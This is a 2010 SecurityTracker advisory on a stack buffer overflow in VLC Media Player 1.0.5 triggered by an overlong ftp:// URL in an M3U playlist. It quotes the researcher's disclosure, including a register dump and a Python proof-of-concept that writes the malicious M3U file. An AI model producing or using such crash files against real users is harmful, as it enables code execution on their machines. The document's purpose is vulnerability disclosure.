SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   VLC Media Player Vendors:   VideoLAN Project
VLC Media Player Buffer Overflow in Processing ftp:// URLs May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1024172
SecurityTracker URL:  http://securitytracker.com/id/1024172
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 6 2010
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 1.0.5
Description:   A vulnerability was reported in VLC Media Player. A remote user may be able to cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted ftp:// URL for a M3U file that, when loaded by the target user, will trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.

Version 1.1.0 is not affected.

Praveen Darshanam reported this vulnerability.

Impact:   A remote user can create a URL that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.videolan.org/vlc/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow

There a Vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files with ftp:// URI handler.



When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.

State of the registers when we opne the malicious file is:



EAX 00000000

ECX 7008A2B7 ASCII ";type="

EDX 01DC743B ASCII "

ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

EBX 01C8C120

ESP 0324FB78

EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

ESI 00000000

EDI 00000000

EIP 77C47C7E msvcrt.77C47C7E

C 0  ES 0023 32bit 0(FFFFFFFF)





Attaching image for above stack trace and PoC script.



#############START PYTHON########################

import sys

import string



print "\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n"



#Tested on Microsoft Windows XP Professional SP3

# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)

# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), Checked on windows 7



#edx register points to our data afetr 4255 bytes

buf1 = "ftp://" + "PRAV" + "\x44" * 4251

buf2 = buf1 + "A" * 4

buf3 = buf2 + "Z" * (100000-4259)



print "100000-4259 is: ", 100000-4259

print "Creating malicious M3U file . . .\n"



filem3u=open('m3uftp.m3u','w')

filem3u.write(buf3)

filem3u.close()



print "Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n"







'''

EAX 00000000

ECX 7008A2B7 ASCII ";type="

EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

EBX 01C8C120

ESP 0324FB78

EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

ESI 00000000

EDI 00000000

EIP 77C47C7E msvcrt.77C47C7E

C 0  ES 0023 32bit 0(FFFFFFFF)





'''

#Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)

# Praveen Darshanam

#############END PYTHON###########################

Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)



Best Regards,

Praveen Darshanam,

Security Researcher
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC